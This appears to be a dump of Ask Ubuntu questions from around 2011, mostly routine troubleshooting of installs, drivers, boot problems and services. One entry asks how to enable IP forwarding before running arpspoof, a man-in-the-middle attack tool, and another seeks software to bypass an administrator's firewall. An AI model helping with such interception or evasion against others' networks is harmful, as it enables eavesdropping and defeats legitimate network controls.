libqtgui4 libqtwebkit4 libraptor2-0 librasqal3 librdf0 libsolid4 libsoprano4 libspeexdsp1 libssh-4 libstreamanalyzer0 libstreams0 libthreadweaver4 libutempter0 libvirtodbc0 libxml2-utils libyajl1 ntrack-module-libnl-0 oxygen-icon-theme phonon phonon-backend-gstreamer plasma-scriptengine-javascript pulseaudio pulseaudio-esound-compat pulseaudio-module-x11 pulseaudio-utils qapt-batch qdbus rtkit shared-desktop-ontologies soprano-daemon virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common suggested packages : docbook-xsl-doc-html docbook-xsl-doc-pdf docbook-xsl-doc-text docbook-xsl-doc libsaxon-java libxalan2-java docbook-xsl-saxon fop xalan dbtoepub libterm-readline-gnu-perl libterm-readline-perl-perl kcachegrind-converters khelpcenter4 djvulibre-bin hspell libqca2-plugin-cyrus-sasl libqca2-plugin-gnupg libqca2-plugin-ossl libqt4-declarative-folderlistmodel libqt4-declarative-gestures libqt4-declarative-particles libqt4-declarative-shaders qt4-qmlviewer libqt4-dev qt4-qtconfig raptor2-utils rasqal-utils librdf-storage-postgresql librdf-storage-mysql librdf-storage-sqlite redland-utils phonon-backend-vlc phonon-backend-xine phonon-backend-mplayer gstreamer0.10-plugins-ugly pavumeter paman paprefs pulseaudio-module-raop the following new packages will be installed : docbook-xsl exiv2 gstreamer0.10-alsa gstreamer0.10-pulseaudio icoutils kate-data katepart kcachegrind kde-runtime kde-runtime-data kdebase-runtime kdelibs-bin kdelibs5-data kdelibs5-plugins kdoctools kubuntu-debug-installer libasound2-plugins libattica0 libcanberra-pulse libclucene0ldbl libdbusmenu-qt2 libdlrestrictions1 libexiv2-10 libilmbase6 libiodbc2 libkatepartinterfaces4 libkcmutils4 libkde3support4 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpty4 libkrosscore4 libktexteditor4 libnepomuk4 libnepomukquery4a libnepomukutils4 libntrack-qt4-1 libntrack0 libopenexr6 libphonon4 libplasma3 libpolkit-qt-1-1 libpulse-mainloop-glib0 libqapt-runtime libqapt1 libqca2 libqt4-dbus libqt4-declarative libqt4-designer libqt4-network libqt4-opengl libqt4-qt3support libqt4-script libqt4-sql libqt4-sql-mysql libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libqtwebkit4 libraptor2-0 librasqal3 librdf0 libsolid4 libsoprano4 libspeexdsp1 libssh-4 libstreamanalyzer0 libstreams0 libthreadweaver4 libutempter0 libvirtodbc0 libxml2-utils libyajl1 ntrack-module-libnl-0 oxygen-icon-theme phonon phonon-backend-gstreamer plasma-scriptengine-javascript pulseaudio pulseaudio-esound-compat pulseaudio-module-x11 pulseaudio-utils qapt-batch qdbus rtkit shared-desktop-ontologies soprano-daemon virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common 0 upgraded , 107 newly installed , 0 to remove and 0 not upgraded . need to get 918 kb/70.0 mb of archives . after this operation , 256 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //tw.archive.ubuntu.com/ubuntu/ oneiric-updates/main pulseaudio amd64 1:1.0-0ubuntu3.1 connection failed failed to fetch http : //tw.archive.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_1.0-0ubuntu3.1_amd64.deb connection failed e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? $
89000	ubuntu updates ( nothing occurs )	when i run update manager and try to install something , when it starts , says : `` preparing packages '' and nothing occurs . any idea ? this situation occurs with any package that i choose . ubuntu version : 10.04 for example sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following new packages will be installed : linux-headers-2.6.32-37 linux-headers-2.6.32-37-generic linux-image-2.6.32-37-generic the following packages will be upgraded : libarchive1 linux-generic linux-headers-generic linux-image-generic linux-libc-dev 5 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . 521 not fully installed or removed . need to get 0b/43.5mb of archives . after this operation , 185mb of additional disk space will be used . do you want to continue [ y/n ] ? y` then it hangs ... try sudo apt-get install -f sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libnb-platform10-java kdebase-runtime-data-common libnb-java2-java libwxgtk2.6-0 libswt-gtk-3.5-jni libknotificationitem1 liblogkit-java kde-icons-oxygen libexiv2-5 libkadm5clnt6 liblzma0 libmysqlclient15off libnb-ide11-java kdebase-runtime-bin-kde4 libwxbase2.6-0 tzdata-java python-wxversion libqt4-phonon khelpcenter4 libqt3-mt python-wxgtk2.6 libswt-gtk-3.5-java stardict-plugin-gucharmap libreadline5 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . 520 not fully installed or removed . after this operation , 0b of additional disk space will be used . it hangs : (
89005	console-based markdown reader	i am working on a remote server that only has a terminal support . there are certain markdown files that i would like to read . however , as i do n't have a gui support , i am in need of a markdown reader/ something similar . the server has lynx installed . so , even if you can suggest some extension to lynx , it will work !
89007	are amd processors less well supported than intel processors ?	i am looking to buy a new laptop , and as the toshiba c660s seem to have small speakers , off-center keyboards and touchpads , and terrible `` two-touch to zoom '' feature , i am browsing lenovo ideapads . becuase of my budget , all the models that jump out at me are amd , and previously i had only heard bad things , except about price , which was usually used in the context of `` you get what you pay for '' . under lenovo on ubuntu friendly , less than 1/10 seem to be amd ( clearly less popular , apparently the average ubuntu user has more cash than i do ) , but they seem to be evenly spread by the ratings , neither typically low or high ranking . under ideapad on ubuntu friendly , only seven have been tested , with 1 amd coming in at 1 star . i hardly think this a fair representation of the processor , so i will ask here . am i more likely to experince problems with an amd powered laptop running ubuntu than an intel powered one , or are my chances about the same ? are amd processors less well supported than intel processors ? specifics lenovo g575 : £349.97 amd dual-core processor e-350 @ 1.60ghz with a 1mb cache amd radeon™ hd 6370m 1gb graphics 4gb ram 15.6 '' screen @ 1366x768 ( 16:9 , widescreen ) 750gb hd dvd±rw 2-in-1 card reader ( mmc , sd ) 4x2.0 usb ports 802.11bgn wifi amd catalyst™ proprietary display driver for linux x86 and linux x86_64
89009	is it possible to install wubi using the iso ?	i have the ubuntu 11.10 iso downloaded but i want to install the wubi for some specific reasons . when i do the click on the wubi installer , it starts downloading files . since i already have the iso with me , is it possible to make use of this iso during the installation ?
89013	upstart not executing the exec function in upstart.conf	i have a completed upstart conf file loaded here : http : //pastebin.com/5e7j5jey but i 'm having trouble with the upstart not executing the exec function and/or relinquishing the kernel console cli back to me . after executing : sudo start itc_d i get nothing back ( no startup status or even a usable cursor ) . if i use ctrl+c and run the command again i get : start : job is already running : itc_d can someone help me understand what i am doing wrong ? perhaps something in my upstart config is wrong , or perhaps my python 's createdaemon ( ) function is not forking as expected ? how can i fix/troubleshoot this issue ? f.y.i - the file the upstart is attempting to execute is a python script that daemonizes itself ( process forks twice ) within the first function . if you would like to see the python script here it is : http : //pastebin.com/xlhehg14 ( the createdaemon ( ) function is the one in question here )
89015	acer aspire one d257 laptop does n't restart	i have ubuntu 11.10 installed with windows 8 on my aspire one d257 . it restarts with windows , not with this one .
89020	is there any software for bypassing the firewall ?	i am using ubuntu 10.04 . is there any software to bypass the firewall configured by my network administrator . i have seen my friend using software named ultrasurf in windows which bypasses the firewll , masks it 's ip , can able to surf anonymously etc ... is there any equivalent software available in ubuntu ?
89024	how can i use vst instruments ?	i have some vst instruments i would like to use on ubuntu . how do i get them to work ? what host applications are available ?
89025	i can not activate my ati/amd proprietary fglrx graphics driver ( post-release updates )	i have recently have upgraded to ubuntu 11.10 and i have not been able to activate by ati radeon mobility hd5400 driver . i have been able to activate the ati/amd propreitary fglrx graphics driver using the amd wiki , but i can not activate the ( post-release update ) driver . when i try to install through the additional driver 's utility i get sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log i have looked all over the internet and almost everyone says to use the command sudo apt-get install fglrx-updates fglrx-amdcccle-updates when i use this though , my driver is no longer recognized as being active and i am back to square one . does anyone know what to do ?
89027	why does wubi.exe for ubuntu 11.10 not run on windows 7 64bit ?	i installed an older version of ubuntu before with the wubi installer . i then did an upgrade of the ubuntu to the latest 11.10 version but this did not work well . icons were missing in ubuntu and it was pretty messed up ( with no option to shut down ubuntu etc. ) . i therefore completely uninstalled ubuntu from within windows 7 64 bit and downloaded the new ubuntu 11.10 wubi.exe . when i now execute the wubi.exe i get the normal win7 `` user account control '' notification asking if i want to allow the program to make changes to my computer . i answer with `` yes '' and now the installer should start . but it does n't ! i just get a quick change of the mouse pointer showing that something happened but then nothing . as if i never tried to execute the wubi.exe . no error messages no nothing . i abviously tried this in all compatibility flavours and as administrator . always the same thing . can anyone help me ?
89031	how do i 'see ' an external usb drive connected directly to my broadband router ?	this is a very frustrating problem ! i have a small home network with several dual boot ubuntu / windows computers . i have recently upgraded my broadband connection and the new router permits the direct attachment of an external usb drive which can back up all of the household 's computers . there are no problems when booted under windows , and there were no problems with older versions of ubuntu , but since upgrading to 11.10 i can no longer `` see '' the drive . i used to find it via network / windows network / home / name of router , but under 11.10 the same method yields an error message unable to mount location failed to retrieve share list from server . can anyone help please ? starting nmap 5.21 ( http : //nmap.org ) at 2011-12-21 10:06 gmt stats : 0:02:02 elapsed ; 0 hosts completed ( 1 up ) , 1 undergoing service scan service scan timing : about 50.00 % done ; etc : 10:10 ( 0:01:56 remaining ) nmap scan report for 192.168.1.254 host is up ( 0.0097s latency ) . not shown : 998 filtered ports port state service version 554/tcp open rtsp ? 7070/tcp open realserver ? service detection performed . please report any incorrect results at http : //nmap.org/submit/ . nmap done : 1 ip address ( 1 host up ) scanned in 152.38 seconds sudo tail -n 30 /var/log/syslog [ sudo ] password for alaric : dec 21 10:05:42 upstairs2u wpa_supplicant [ 882 ] : wpa : group rekeying completed with 00:01:3b:8b:63:1a [ gtk=tkip ]
89044	totem fails at start ( totem:3808 ) , after activating dbus plugin	i am using ubuntu 11.10 ; kernel : linux 3.0.0-14-generic with gnome 3.2.1 yesterday i was browsing through the totem plugins and accidentally hit activate on the dbus plugin . when i started totem after that , it showed the ui for like a second and then quit . i ran it in terminal and got the following error output : ( totem:3808 ) : glib-gobject-critical ** : property 'object ' on class 'zeitgeistdpplugin ' has type 'totemobject ' which is different from the type 'gobject ' , of the property on interface 'peasactivatable' segmentation fault i do n't really get what it 's trying to tell me ... though i am pretty sure that i messed up something by turning on that plugin . so i would like to know how to deactivate it again ... outside of totem . i would also like to know what actually caused the failure .
89045	is there a way to determine progress on a disk check at boot ?	during the boot process , a disk check can be run , but during this process there is no indication or detailed information available to gauge how far along the process is . is there a way to display any information that would indicate how far along it is ? this is more a problem for server environments , rather then desktop environments . looking for information around 10.04 lts .
89047	ubuntu one is quite slow	ubuntu one is quite slow . changed files are rather fast displayed in the web-interface , but not on my second computer 's ubuntu-one folder . does anyone know howto speed-up things ?
89048	can ubuntu one music store be used offline ?	i have a zune hd and want to be able to listen to music without an internet connection . would this be possible ? could i download the music to my computer and then put it on my zune for the 3.99 $ or 39.99 $ a year subscription to ubuntu one ?
89056	my machine is not booting properly . how do i troubleshoot ?	i have a lenovo x120e that is not booting properly . when i turn it on , it just opens to a blank screen . the machine is running ubuntu 10.04 . main details : i shut the lid of the computer while it was running , and then opened it later and noticed that i could n't get out of suspend / hibernate mode . i subsequently powered it down by holding the power button . now when i turn it back on , it just opens to a blank black screen , as if it is still in suspend / hibernate . other details : the 10.04 operating system ( a ) was installed while this hd was in another laptop . since i moved the hd into this machine , i have been booting another os ( b ) , and never updated drivers in a to work with this machine . ( does this matter for this particular situation / problem ? ) what i have tried so far : i found the reisub method here but i do n't have a sysreq button . what are my next steps to troubleshoot / solve ?
89058	how to install the latest stable version of chromium ?	is there an easier way to install chromium than what is described here ? furthermore , is there an easier way to stay up to date with current chromium releases rather than having to re-build chromium each release ? ( a script which automatically grabs and installs the latest build possibly ? ) . related : how do i get the latest ( beta and development ) version of chromium ?
89059	how can i fix a gtk 3 theme window border looking wrong ?	this image speaks for itself : the white line between the window border and the window body is not supposed to be there . i 've seen other users dealing with the same issue but i 've never seen a solution posted . the problem remains whether the theme is placed in /usr/share/themes or ~/.themes . thanks for your help !
89062	is there a way of making banshee use freedb ?	basically , banshee currently uses musicbrainz for cd ripping , but some albums that i have have n't been in there , but have been in freedb , is there a way of making banshee use freedb when i rip cds ?
89063	ca n't enable wireless on lenovo thinkpad edge 520	i 've tried several things like mentioned in the forums , but i 'm at a loss . everything works fine except wireless internet . i see using terminal that it detects the drive but it is disabled . i go to enable it , and it quickly puts the check mark on , then checkmark comes off . no error messages . i tried checking for updates , installing a windows based wireless driver and happend on ubuntu version 10 , 11.04 and 11.10 now . same issue . i really want to switch over to using ubuntu , but if i ca n't get a basic thing like wireless internet , i ca n't begin to try various programs , etc . my laptop is only a few months old and came with windows 7 if that helps .
89064	what do i need to do to switch from ubuntu to lubuntu on a dual boot computer ?	i got a new laptop which makes my old one with a dual boot of xp and 11.10 redundant . everything has been moved over and this is a perfect chance to play around with variants . i would like to replace the ubuntu with lubuntu but assume that if i just remove the ubuntu partition to make room there will be issues with the existing grub . is there a way to do this ? or as another possibility i could shrink the ubuntu partition and install something in the empty space . will an ubuntu based installer recognize what is going on and set up a triple boot as effortlessly as it does a dual boot ?
89067	reduced computer performance when ac power is plugged in on a dell latitude 5420	i have dell latitude 5420 laptop and yesterday i have istalled 11.10 ubuntu . all instalation process was done on battery power , so there was no problem on performance . today i have plugged in my computer and tried to turn on ubuntu and there is a problem . when computer runs on battery power performace is perfect , but when i plug to charge battery all system slows down and mouse moves very slovly .
89082	storing passwords with python keyring	i 'm using keyring library to store passwords in my python app . import keyring keyring.set_password ( 'my namespace ' , username , password ) keyring.get_password ( 'my namespace ' , username ) and this works very well . i assume that passwords are safe in keyring , they are encrypted . but , since i can get them by username , what prevents other apps to do the same ? is n't that a security risk , or am i missing something ?
89085	how can i install draftsight ?	there is an error which shows : `` dependency is not satisfiable : libxcb-render-util0 ( > = 0.3.6-1 ) '' can somebody help me on this ?
89088	why do dpkg and aptitude want to remove most of my system ?	i was installing and uninstalling some packages on my home 11.10 system , when i suddenly noticed that dpkg and aptitude want to remove almost everything . synaptic seems fine . at work , where i have an almost identical setup , i am not having this problem . from here , i thought it was a multiarch problem , but , again , the same setup at work is fine . the only thing besides current updates that i 've applied was a qdbus package , which i notice now was i386 . i installed the `` normal '' version , which automatically uninstalled the 32-bit version , but my system is still insane . i ca n't get aptitude to make sense out of the recommendations . if i use `e ' to examine the solution , it starts a slow count to inifinity . if i disable multiarch , as in the other thread , then aptitude can make sense of it 's own resolution , but that 's still to remove thousands of packages , and free 4 gb of drive space ( which is just about everything ) . is there any way to get this sorted , or am i looking at a reinstall ? update : i 'm seeing various packages with status `` pd '' . i ca n't find any reference that tells me what the `` d '' means . > -/ second update : i disabled multiarch , and aptitude thought it could work things out . despite telling me that it was going to keep 832 packages , it started deleting them all . screw it . i 'll just reinstall . i 'm getting too old for this crap .
89091	purple screen then black screen while booting from cd or windows install	whenever i try to run ubuntu from my internal cd drive , i see this screen minus the ubuntu text : then the screen goes black , not even the internal light stays on . sometimes it restarts itself , other times the black screen is indefinite until i restart the laptop myself . i 'm on an hp quad-core amd a8-3500m apu with 8 gb ram and a radeon amd 6620g discrete-graphics card . ( hp dv6-6145dx ) this is my first time using linux , i am not too technically-inclined so any simplification would be welcomed . i am good at following technical instructions though which is how i was able to partition my hard drive and change the boot order to allow the internal cd drive first . thanks in advance !
89095	is ubuntu well-suited as a small business solution ?	is ubuntu well-suited as a small business solution ? i have a very scared part time it manager who thinks it 's not suitable . please can you clarify ?
89096	how do i enable the `` multiverse '' repository ?	i keep seeing places refer to the `` multiverse '' repository as a place i can get software , how can i enable this repository ? please specify how to do this graphically and via command line .
89101	how do i use persistent mode on the livecd ?	i followed the tutorial here but i 'm stuck at the part where i need to add ''persistent '' on the ''kernel arguments list '' . i do n't know how to do that . any help would be appreciated . thanks !
89102	how do i enable unity 2d on the livecd ?	my computer is pretty old so i 'd really like to have unity 2d enabled . does anyone know how to do that ? thanks in advance !
89104	controlling multiple audio outputs volume ?	i have a little bluetooth audio receiver , which i use to play music through my stereo . every time i power it on , all audio automatically switchs to it , but alsa seems not to `` know '' it , so volume keys keep corresponding to internal audio . it 's not a major problem , i enter to audio settings , and select the correct device . ( i filled a bug about this here ) i use pulseaudio volume control to select which apps play sounds through which audio output device ( bt or internal audio ) . the point is that i have to configure it every time i power on the receiver . is there a way to permanently set certain apps to play sounds via specific audio devices ? for example : chromium-browser to internal audio , and banshee to bt ? another quick question , is there a way to match volume keys to control the volume of the audio device that the focused app is playing sounds through ? thanks a lot !
89105	how do i relocate on my ubuntu moveable directories /var and /usr ?	i 'm using ubuntu 10.10 - the maverick meerkat . and my root partition is too small to hold those two on / . can anyone make a suggestion on how to do this : '' '' '' create a new partition for a large moveable directory like home , var or usr . then i rsync the directory onto the new partition and mount it. `` '' '' there was a similar subject opened on how do i change software center 's default installation path ? , but as i am pretty new to ubuntu i am struggling to reach a solution . i want to move /usr and /var on the same partition with /home , but i do n't want to make separate partitions for each one of them . for moving /home i used this solution : https : //help.ubuntu.com/community/partitioning/home/moving # different_filesystems_on_the_same_disk i think i need a labeling in my fstab , can anyone tell me if this is a good idea , or give a better one ?
89108	major problem with nvidia drivers	since i decided to use ubuntu -yesterday- i 've been struggling with the drivers . it is n't recognizing my optical disc drive nor my video card , a nvidia 8500gt . for the matter , here 's how i `` successfully '' installed the .run driver downloaded from nvidia 's website : the terminal would n't let me start the installation because the x server had to be shutdown , so i pressed ctrl+alt+f1 then , i used : sudo service lightdm stop cd / ( directory where the nvidiaupdate.run was ) chmod +x nvidiaupdate.run sudo ./nvidiaupdate.run the installation began and got completed , but unfortunately it crashed ubuntu 's ui , invalidating the os for me . all that would appear was a dos-like screen with reports . i 'm new to linux , so i really would appreciate any help given . for now , i 'm sticking to the additional drivers , but even with it ubuntu does n't show my video card in the informations of the system . forgive my bad english .
89112	ca n't create file /proc/sys/net//ipv3/ip_forward ( to ip forward before arpspoof )	when i type : $ sudo echo 1 > /proc/sys/net/ipv3/ip_forward i get : bash : /proc/sys/net/ipv3/ip_forward : no such file or directory i ca n't mkdir any folder past /proc/sys/net nor can i move or create a file there . i try to setup my box to ip forward before launching arpspoof thank 's for your input ! edit : now with a variant i get : $ sudo echo 1 > /proc/sys/net/ipv4/ip_forward bash : /proc/sys/net/ipv4/ip_forward : permission denied
89114	logoff on suspend	just recently , my ubuntu 11.10 laptop presents my with the login screen when resuming from sleep ( suspend ) mode . so i basically loose any work i had open when i put the computer to sleep . any idea why or how to fix this ?
89115	why is my ubuntu partition louder than my windows partition	my laptop came with windows preinstalled . i shrank the windows partition and created a couple of new partitions to install ubuntu in . i 've noticed that reading my ubuntu partitions is much noisier than reading the ntfs partiion . this applies whether i am running windows or ubuntu - reading/writing any data to my ubuntu partition makes the hard drive fairly noisy , whereas reading/writing any data to my ntfs partitions is much quieter . what could be the reason behind this ? it 's all on the same hard drive and ca n't have anything to do with the operating systems themselves as the results are reproducible in both windows and ubuntu . in short , why is reading/writing to my ntfs partitions quieter than reading/writing to the ext3 partition ? thanks very much
89125	does ubuntu follow the linux standard base ( lsb ) ?	i was reading about the linux standard base and was wondering if the structure used in ubuntu is the same that is suggested in the lsb . i know some distros do not follow or do some changes to the lsb , so i also want to know if ubuntu has some changes , and what changes these are .
89127	how do i install adobe acrobat reader ?	i am new to ubuntu , but i believe i have ubuntu 11.10 installed correctly . i am trying to install acroread using adberdr9.4.6-1_i386linux_enu.deb that i downloaded from the adobe web site . how do i do this ?
89133	what sites offer installing ubuntu packages with apturl	are there any sites that offer installing ubuntu packages through apturl . the only one i know for now is http : //appnr.com/ but what others exists with a similar way of installing packages .
89136	xbmc-live ( ubuntu based ) setting up tty8	i 'm running xbmc-live which is an ubuntu distro with xbox media center ( xbmc ) as the default window manager . i 'm trying to leave xbmc set up on tty7 , as it is , and have a normal window manager on added for tty8 , so i can use a web browser and stuff . the guides i found for setting up tty8 all use gdm configure files , but i do n't even have gdm installed and installing gdm wants me to remove xbmc-live , which is definetly not what i want . any tips how i can set up tty8 to be a regular wm given these conflicts ? i do n't really even need tty8 to have a login like gdm , it could just directly launch a window manager .
89139	how to use wine ?	i installed wine from the ubuntu software center , but i 'm really not sure how to get my windows applications to work . i have photoshop installed on a the windows partition of my hard drive and i can see it in the home folder thing . however , when i click on the photoshop.exe file , nothing happens . am i doing something wrong ? please help .
89140	running low disk space	i am running ubuntu 11.10.for past few days i am getting messages stating that running on low disk space.can any one help me to free space ? . df -h shows this http : //paste.ubuntu.com/775964/ sudo fdisk -l shows this http : //paste.ubuntu.com/775963/ i am having windows 7 as the other os . note : i am novice in linux .
89145	connect to vpn via another port ( change pptp client port )	as you know pptp port is 1723 by default , know i forward port number 21 to 1723 on my centos vpn . know i wan na connect to my vpn ( pptp ) from port number 21 . how can i do it ?
89147	how can i adjust the resolution to avoid the damaged area on my screen ?	i have a laptop that has a damaged screen . the 24 pixels ( approximately ) on the right side of the screen are damaged ( this is definitely not a driver problem , it is physical damage ) . it is not a straight bar , but rather a lot of black pixels that ebb and flow with some multicolored pixels around the edges . i got this from someone so do n't know the root cause : possibly water damage ? anyway , the `` power menu as well as any scroll bars ( when applications are full screen ) are hidden behind this damaged area . is there a way i can adjust the screen resolution or dimension so that these right side 24 pixels are not used ? so , the laptop is 1024 x 768 . can i modify so that it is 1000 x 768 ( and the 1000 are the leftmost 1000 pixels , not centered ? ) ? i was able to try using `` xrandr '' to force the screen to be 1000 wide , but then it is still centered , so it still only ignores 12 pixels on the right . thanks for any help . this is with ubuntu 11.10 .
89150	how to install while keeping extra windows drives	i have genuine windows 7 home premium in my hp laptop . a few days back it did n't accept my admin password . now i want to load my machine with ubuntu . the following is my partition details : c : // has windows d : // recovery disk e : and f : // data i do n't want to delete the e : \ and f : \ drives . is there a way i can load ubuntu into my machine ? i do n't mind giving up windows 7 . partition filesys label size used unused flag /dev/sda1 ntfs system 992.5kb - - /dev/sda2 ntfs 199.00mb - - boot /dev/sda3 ntfs stud 228.2gb 90.19gb 138.01gb /dev/sda4 ntfs cram 237.37gb 53.66gb 183.7gb unallocated unallocated 1mb
89152	configure phpmyadmin for php4	i am new to linux and i am using ubuntu ( 11.01 ) and through google i installed php5.3 , mysql apache2 and phpmyadmin each were working smooth , but i needed php4.4.9 i google and download the php4.4.9 and with following steps : http : //www.websoftix.com/blog/how-to-run-php4-in-paralel-with-php5-on-ubuntu-11 and now php4 is working but when i am going to start phpmyadmin i got message : php 5.2+ is required it means the phpmyadmin not working for php4.4.9 but now i do n't know what to do , means how and from where i installed phpmyadmin for php4.4.9 please help me to solve out this problem .
89154	external monitor flickers on ubuntu , works fine on windows	i have dell inspiron n4030 , with intel onboard . when i connect my laptop to external monitor on ubuntu the screen flickers ( photo attached ) . the same screen works fine when i reboot into windows . please help : )
89156	can not start xampp on ubuntu 11.10	when i try to start xampp with sudo /opt/lampp/lampp start command it gives me a message like this . starting xampp for linux 1.7.7 ... xampp : another web server daemon with ssl is already running . xampp : starting mysql ... xampp : could n't start mysql ! xampp : xampp-proftpd is already running . xampp for linux started . what is this and how can i find what was this another web server daemon with ssl . how to stop this server ?
89159	prevent standard users from seeing and mounting drives	my user id is 1000 and second user id is 1001 and my fstab entry for the drives are # /media/data_ext4 was on /dev/sda7 during installation uuid=1c2862cf-5838-49a7-bcef-715319a7841e /media/data_ext4 ext4 defaults , nofail , uid=1000 0 0 # /media/ntfs was on /dev/sda3 during installation uuid=4a94a52994a51889 /media/ntfs ntfs defaults , uid=1000 0 0 but still uid=1001 can access these drives as mounted volumes ... .
89160	why i ca n't set 2 cpu on virtualbox xp ?	i set 2 cpu on virtualbox xp and boot successfully . but when i use speccy to check . it says i only have 1 cpu and only 1 core . what happened ? how do i enable the second cpu ? thank you~
89164	how do i get upstart to start my mediatomb service ?	i 've been struggling , trying to get my mediatomb server to start automatically on upstart run level 2 . i ca n't figure it out . i guess upstart is still new to me and i do n't understand it . i even read the whole manual and it is vague and never mentions any of the inner workings of how things work . i can obviously run mediatomb with this command and so getting it to run is not my question : sudo mediatomb -- config /etc/mediatomb/config.xml or mediatomb -- config ~/.mediatomb/config.xml i know upstart supposedly will start services as superuser but what happens when running upstart commands as a normal user ? do priviledges get escalated ? i ca n't seem to figure it out . these commands do n't work : service mediatomb start /etc/init.d/mediatomb start sudo initctl start mediatomb ( says it started but not really ) to me , this all seems to be some kind of permissions issue but i do n't understand enough about upstart to figure this out . very frustrating . me @ linux : /etc/init $ start mediatomb start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.58 '' ( uid=1000 pid=2665 comm= '' start mediatomb `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' )
89166	which paging utility is being used ?	at a bash prompt , hitting tab twice will come up with a prompt such as display all 1770 possibilities ? ( y or n ) . what paging utility is bash using ? it does n't appear to be less or more . is it something internal to bash ?
89168	win7 and ubuntu refuse to coexist	i 'll make this quick : i have an hp laptop with win7 , i installed ubuntu on a separate partition , and when i tried to boot win7 from grub i got the loading screen and no progress-ever . i did a /fixmbr with the windows recovery cd and got back windows , but wiped out grub and my access to ubuntu . i reinstalled grub from the ubuntu live usb ( i know i did this correctly ) and now windows wo n't boot , again . i 'm a linux noob at a loss . your wisdom is greatly appreciated ! update in response to scott severance : your instructions say to determine the main partition on my computer . i 'm not sure what this means ... my windows partition is at sda2 , my boot partition is at sda1 , and my linux root partition is at sda7 ... which is the `` main '' partition ? update : i determined that you were probably referring to the linux root ( / ) partition , because this was the only partition for which i could follow your instructions without errors . now , windows is booting fine ( thanks to /fixmbr ) , but even after the grub instructions there is no grub . it boots straight into windows .
89169	why ca n't i install xubuntu-desktop ?	when i try to install xubuntu on my current ubuntu installation , it wo n't let me install `` xubuntu-desktop '' , but it will instead recommend me to install other packages in the xubuntu repos . has the package name changed or do i have to wait for an updated version ?
89170	use virtualbox without iso ?	i have windows 7 and ubuntu installed on my computer ( dual booting ) . i want to use the zune software in windows 7 , but seeing as that is the only reason i need it , i want to use virtalbox . however , my computer did n't come with a cd/iso for windows 7 , so i 'm not sure how i would go about getting virtalbox to boot into windows 7 . please help me out !
89173	preserving multi-column output from ls when paging	by default , ls displays its output in multiple columns , but when it 's sent to a pager such as less it 's reformatted as a single column . is there any way i can page the original , multiple-column output and preserve the formatting ?
89182	how do i enable the indian rupee sign in natty ?	the new indian rupee sign , unicode 20b9 , is supposed to have been introduced in ubuntu 10.10 maverick . it is already the default currency symbol for the english ( india ) ( en_in ) locale in ubuntu 11.10 oneiric . however , in natty the default currency symbol , as displayed in the gnome regional formats window , is still the older generic rupee sign , rs , unicode 20a8 . in character map i found that unicode 20b9 is not defined in natty , even with the latest version of the ubuntu font . without this definition , the symbol seems to remain unavailable no matter what the font . is there any way to enable the new symbol ?
89185	what is the correct way of setting up an abnt2 keyboard layout in preseed ?	i am creating a preseeding file for an automatic ubuntu 11.10 installation and i am having problems setting up the keyboard configuration . i need the keyboard to be configured as abnt2 so i added this to the file : # keyboard selection . # disable automatic ( interactive ) keymap detection . d-i console-setup/ask_detect boolean false d-i keyboard-configuration/layoutcode string br d-i keyboard-configuration/modelcode abnt2 but the keyboard is set as us . and the first time i log into the new installation i get an `` incomplete language support error '' . what is the correct way of setting up an abnt2 keyboard layout ?
89187	ubuntu automatic install keyboard config	i am creating a preseeding file for an automatic ubuntu 11.10 installation and i am having problems setting up the keyboard configuration . i need the keyboard to be configured as abnt2 so i added this to the file : # keyboard selection . # disable automatic ( interactive ) keymap detection . d-i console-setup/ask_detect boolean false d-i keyboard-configuration/layoutcode string br d-i keyboard-configuration/modelcode abnt2 but the keyboard is set as us . and the first time i log into the new installation i get an `` incomplete language support error '' . what is the correct way of setting up an abnt2 keyboard layout ? thanks kelly
89189	why i get compile error in intellij idea 11 ?	i recently switched to ubuntu 11.10 . i checked out my project from svn and created the required modules and libraries in intellij as always . but for some reason i ca n't compile the project and i get : error : *.class ( no such file or directory ) for all of the classes in the project . i checked the project structure and everything seems normal . i ca n't even guess what the problem might be . the only difference in the project under ubuntu from windows is that i used sun java 6 in windows but now i 'm using openjdk 6 . i will provide more details if required .
89191	static ip value set in orchestra not being applied on installation	i have orchestra setup to make install through the network . on my kickstart file i have this # static network configuration . d-i netcfg/get_nameservers string 10.1.1.249 d-i netcfg/get_ipaddress string $ static_ip d-i netcfg/get_netmask string 255.0.0.0 d-i netcfg/get_gateway string 10.1.1.11 d-i netcfg/confirm_static boolean true the static_ip value i have set on system - > kickstart metadata like static_ip=10.1.1.8 but this config has no effect on the installation . what is wrong on this configuration ? i am trying to install ubuntu 11.10
89192	updating my resolv.conf manually	i need to update my resolv.conf , for this reason . so i simply nano 'd the file and edited ( added the aformentioned line ) . however , i then rebooted and the file has reverted to its original state . what is the correct way to manually update this file ?
89195	a quick question on fixing bugs in repository software	i want to start getting involved in contributing to ubuntu . i have found a bug in the eclipse package and know how to fix it , so i thought this would be a good first step . i just want to check if following this workflow is the correct way to fix bugs for ubuntu : https : //wiki.ubuntu.com/packagingguide/recipes/packageupdate thank you for your help
